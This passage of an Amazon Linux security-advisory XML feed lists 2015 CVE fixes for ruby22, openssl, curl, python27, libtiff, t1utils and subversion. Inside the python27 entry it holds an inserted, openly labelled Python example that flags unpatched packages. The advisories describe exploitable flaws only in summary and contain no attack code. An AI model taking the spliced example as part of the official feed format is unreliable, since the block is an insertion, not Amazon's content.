epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.6-1.17.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-549</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-549: medium priority package update for ruby22</title><issued date="2015-06-16 10:30:00" /><updated date="2015-06-18 20:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4020:
Incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.
CVE-2015-3900:
RubyGems did not validate the hostname returned in the SRV record before sending requests to it.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3900" title="" id="CVE-2015-3900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4020" title="" id="CVE-2015-4020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby22-devel" version="2.2.2" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.2-1.6.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.2" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.2-1.6.amzn1.noarch.rpm</filename></package><package name="ruby22-libs" version="2.2.2" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.2-1.6.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.6.amzn1.x86_64.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.2" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.2-1.6.amzn1.x86_64.rpm</filename></package><package name="ruby22-irb" version="2.2.2" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.2-1.6.amzn1.noarch.rpm</filename></package><package name="rubygems22-devel" version="2.4.5" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5-1.6.amzn1.noarch.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8-1.6.amzn1.x86_64.rpm</filename></package><package name="rubygems22" version="2.4.5" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5-1.6.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.6.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.6.amzn1.x86_64.rpm</filename></package><package name="ruby22" version="2.2.2" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.2-1.6.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.6.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.2" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.2-1.6.amzn1.i686.rpm</filename></package><package name="ruby22-libs" version="2.2.2" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.2-1.6.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.2" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.2-1.6.amzn1.i686.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.6.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8-1.6.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.2" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.2-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-550</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-550: medium priority package update for openssl</title><issued date="2015-06-16 11:29:00" /><updated date="2015-06-16 11:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4000:
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic.
1223211:
CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks
CVE-2015-3216:
A regression was found in the versions of OpenSSL shipped with Red Hat Enterprise Linux 6 and 7, in the ssleay_rand_bytes() function. This could lead a multi-threaded application to crash.
1227574:
CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression
CVE-2015-1792:
A denial of service flaw was found in OpenSSL in the way it verified certain signed messages using CMS (Cryptographic Message Syntax). A remote attacker could cause an application using OpenSSL to use excessive amounts of memory by sending a specially-crafted message for verification.
1228607:
CVE-2015-1792 OpenSSL: CMS verify infinite loop with unknown hash function
CVE-2015-1791:
A race condition was found in the session handling code of OpenSSL. An attacker could cause a multi-threaded SSL/TLS server to crash.
1228608:
CVE-2015-1791 OpenSSL: Race condition handling NewSessionTicket
CVE-2015-1790:
A NULL pointer dereference was found in the way OpenSSL handled certain PKCS#7 inputs. An attacker able to make an application using OpenSSL verify, decrypt, or parse a specially crafted PKCS#7 input could cause that application to crash. TLS/SSL clients and servers using OpenSSL were not affected by this flaw.
1228604:
CVE-2015-1790 OpenSSL: PKCS7 crash with missing EnvelopedContent
CVE-2015-1789:
An out-of-bounds read flaw was found in the X509_cmp_time() function of OpenSSL, which is used to test the expiry dates of SSL/TLS certificates. An attacker could possibly use a specially-crafted SSL/TLS certificate or CRL (Certificate Revocation List), which when parsed by an application would cause that application to crash.
1228603:
CVE-2015-1789 OpenSSL: out-of-bounds read in X509_cmp_time
CVE-2014-8176:
An invalid-free flaw was found in the way OpenSSL handled certain DTLS handshake messages. A malicious DTLS client or server could send a specially-crafted message to the peer, which could cause the application to crash or potentially cause arbitrary code execution.
1228611:
CVE-2014-8176 OpenSSL: Invalid free in DTLS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8176" title="" id="CVE-2014-8176" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1789" title="" id="CVE-2015-1789" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1790" title="" id="CVE-2015-1790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1791" title="" id="CVE-2015-1791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1792" title="" id="CVE-2015-1792" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3216" title="" id="CVE-2015-3216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="10.86.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-devel-1.0.1k-10.86.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-10.86.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-10.86.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-10.86.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-10.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-551</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-551: medium priority package update for curl</title><issued date="2015-06-18 20:48:00" /><updated date="2015-06-18 20:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3237:
libcurl can get tricked by a malicious SMB server to send off data it did not intend to.
CVE-2015-3236:
libcurl can wrongly send HTTP credentials when re-using connections.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3236" title="" id="CVE-2015-3236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3237" title="" id="CVE-2015-3237" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.40.0" release="3.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-3.51.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="3.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-3.51.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="3.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-3.51.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="3.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-3.51.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="3.51.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-3.51.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.40.0" release="3.51.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-3.51.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="3.51.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-3.51.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="3.51.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-3.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-552</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-552: medium priority package update for python27</title><issued date="2015-06-22 10:31:00" /><updated 
date="2017-08-31 22:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9365:
The Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data.
1173041:
CVE-2014-9365 python: failure to validate certificates in the HTTP client with TLS (PEP 476)
CVE-2013-1753:
It was discovered that the Python xmlrpclib did not restrict the size of a gzip compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory.
1046170:
CVE-2013-1753 python: XMLRPC library unrestricted decompression of HTTP responses using gzip encoding
CVE-2013-1752:
It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.
1046174:
CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
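<![CDATA[
Each advisory in this feed names the fixed build as epoch, version and release per package and arch; the check a practitioner wants is whether the build actually installed is older than that. The following is an added example, not part of the ALAS feed or of any Amazon tooling. It parses a constructed updateinfo fragment laid out like this file (two of the advisories listed above, trimmed to one package each), compares it against a constructed installed-package inventory using a Python port of rpm's rpmvercmp(), and flags every installed package whose EVR sorts below the fix. The function names unpatched(), evr_cmp(), rpmvercmp() and parse_updateinfo() and the constants SAMPLE_UPDATEINFO and INSTALLED are the example's own. Epoch is compared first, so an openssl 0:1.0.2d would still be flagged against the 1:1.0.1k-10.86.amzn1 build under ALAS-2015-550, and a package is only matched on the same name and arch.

```python
# Added example, not part of the ALAS feed or of any Amazon tooling: parse an updateinfo.xml
# fragment and flag installed packages older than the fixed build. rpmvercmp() ports rpm's
# rpmvercmp.c (tilde and caret rules included); the sample feed and inventory are constructed.
import xml.etree.ElementTree as ET


def rpmvercmp(a, b):
    """Compare two version or release strings the way rpm does: returns -1, 0 or 1."""
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        # skip separators: anything that is not alphanumeric, '~' or '^'
        while i < len(a) and not (a[i].isalnum() or a[i] in "~^"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] in "~^"):
            j += 1
        ca = a[i] if i < len(a) else ""
        cb = b[j] if j < len(b) else ""
        if ca == "~" or cb == "~":  # tilde sorts before everything, even end of string
            if ca != cb:
                return -1 if ca == "~" else 1
            i, j = i + 1, j + 1
            continue
        if ca == "^" or cb == "^":  # caret: end of string sorts below it, alnum above it
            if ca != cb:
                return -1 if ca == "" or (ca == "^" and cb != "") else 1
            i, j = i + 1, j + 1
            continue
        if ca == "" or cb == "":
            break
        # take a run of digits, or else a run of letters, from both sides
        isnum = ca.isdigit()
        si, sj = i, j
        while si < len(a) and (a[si].isdigit() if isnum else a[si].isalpha()):
            si += 1
        while sj < len(b) and (b[sj].isdigit() if isnum else b[sj].isalpha()):
            sj += 1
        sa, sb = a[i:si], b[j:sj]
        if not sb:  # segments of different kind: a numeric segment is newer
            return 1 if isnum else -1
        if isnum:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):  # more digits means a bigger number
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
        i, j = si, sj
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1


def evr_cmp(e1, v1, r1, e2, v2, r2):
    """Compare (epoch, version, release); a higher epoch wins regardless of version."""
    if int(e1) != int(e2):
        return 1 if int(e1) > int(e2) else -1
    return rpmvercmp(v1, v2) or rpmvercmp(r1, r2)


def parse_updateinfo(xml_text):
    """Yield (advisory id, severity, cve ids, [(name, epoch, version, release, arch)])."""
    for upd in ET.fromstring(xml_text).iter("update"):
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        pkgs = [(p.get("name"), int(p.get("epoch", "0")), p.get("version"),
                 p.get("release"), p.get("arch")) for p in upd.iter("package")]
        yield upd.findtext("id"), upd.findtext("severity"), cves, pkgs


def unpatched(xml_text, installed):
    """Findings for installed (name, epoch, version, release, arch) older than an advisory's fix."""
    have = {(n, a): (e, v, r) for n, e, v, r, a in installed}
    out = []
    for adv, sev, cves, pkgs in parse_updateinfo(xml_text):
        for name, epoch, ver, rel, arch in pkgs:
            cur = have.get((name, arch))  # same name and arch only
            if cur and evr_cmp(*cur, epoch, ver, rel) < 0:
                out.append({"advisory": adv, "severity": sev, "cves": cves,
                            "package": name + "." + arch, "installed": "%s:%s-%s" % cur,
                            "fixed": "%s:%s-%s" % (epoch, ver, rel)})
    return out


# Constructed sample in this feed's layout: two advisories from this file, one package each.
SAMPLE_UPDATEINFO = """<updates>
<update status="final" version="1.4" type="security" from="linux-security@amazon.com"><id>ALAS-2015-550</id><severity>medium</severity>
<references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" id="CVE-2015-4000" type="cve" /></references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package></collection></pkglist></update>
<update status="final" version="1.4" type="security" from="linux-security@amazon.com"><id>ALAS-2015-552</id><severity>medium</severity>
<references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9365" id="CVE-2014-9365" type="cve" /></references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.9-4.114.amzn1.x86_64.rpm</filename></package></collection></pkglist></update>
</updates>"""

# Constructed inventory: one build behind the fix, exactly the fixed build, not covered at all.
INSTALLED = [("openssl", 1, "1.0.1k", "10.85.amzn1", "x86_64"),
             ("python27", 0, "2.7.9", "4.114.amzn1", "x86_64"),
             ("curl", 0, "7.40.0", "3.51.amzn1", "x86_64")]

if __name__ == "__main__":
    for f in unpatched(SAMPLE_UPDATEINFO, INSTALLED):
        print("%(advisory)s %(package)s: have %(installed)s, fixed in %(fixed)s" % f)
```

Run against the constructed inventory, only openssl.x86_64 is reported: 1:1.0.1k-10.85.amzn1 sorts below the 1:1.0.1k-10.86.amzn1 fix, python27 is already at the fixed build, and curl has no advisory in the sample. To use it against a real host, feed the full updateinfo.xml and an inventory built from rpm -qa with the epoch, version, release and arch tags; packages whose epoch differs from the advisory's will be compared on epoch alone, which is the behaviour yum relies on.
]]>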
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752" title="" id="CVE-2013-1752" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1753" title="" id="CVE-2013-1753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9365" title="" id="CVE-2014-9365" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.9" release="4.114.amzn1" epoch="0" 
arch="i686"><filename>Packages/python27-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.9-4.114.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-553</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-553: medium priority package update for libtiff</title><issued date="2015-06-22 15:07:00" /><updated date="2015-06-24 10:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1547:
1190709:
CVE-2015-1547 libtiff: use of uninitialized memory in NeXTDecode
CVE-2014-9655:
1190703:
CVE-2014-9655 libtiff: use of uninitialized memory in putcontig8bitYCbCr21tile and NeXTDecode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9655" title="" id="CVE-2014-9655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1547" title="" id="CVE-2015-1547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-debuginfo" version="4.0.3" release="20.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-20.20.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="20.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-20.20.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="20.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-20.20.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="20.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-20.20.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="20.20.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-20.20.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="20.20.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-20.20.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="20.20.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-20.20.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="20.20.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-20.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-554</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-554: medium priority package update for 
t1utils</title><issued date="2015-06-22 20:26:00" /><updated date="2015-06-24 10:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3905:
A buffer overflow flaw was found in the way t1utils processed, for example, certain PFB (Printer Font Binary) files. An attacker could use this flaw to potentially execute arbitrary code by tricking a user into processing a specially crafted PFB file with t1utils.
1218365:
CVE-2015-3905 t1utils: buffer overflow flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3905" title="" id="CVE-2015-3905" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="t1utils-debuginfo" version="1.39" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1utils-debuginfo-1.39-1.3.amzn1.x86_64.rpm</filename></package><package name="t1utils" version="1.39" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1utils-1.39-1.3.amzn1.x86_64.rpm</filename></package><package name="t1utils" version="1.39" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/t1utils-1.39-1.3.amzn1.i686.rpm</filename></package><package name="t1utils-debuginfo" version="1.39" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/t1utils-debuginfo-1.39-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-555</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-555: medium priority package update for mod_dav_svn subversion</title><issued date="2015-06-24 10:08:00" /><updated date="2015-06-24 10:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8108:
A NULL pointer dereference flaw was found in the way the mod_dav_svn module handled certain requests for URIs that trigger a lookup of a virtual transaction name. A remote, unauthenticated attacker could send a request for a virtual transaction name that does not exist, causing mod_dav_svn to crash.
1174057:
CVE-2014-8108 subversion: NULL pointer dereference flaw in mod_dav_svn when handling URIs for virtual transaction names
CVE-2014-3580:
A NULL pointer dereference flaw was found in the way the mod_dav_svn module handled REPORT requests. A remote, unauthenticated attacker could use a specially crafted REPORT request to crash mod_dav_svn.
1174054:
CVE-2014-3580 subversion: NULL pointer dereference flaw in mod_dav_svn when handling REPORT requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3580" title="" id="CVE-2014-3580" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8108" title="" id="CVE-2014-8108" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-ruby" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package 
name="subversion-python26" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.8.11" 
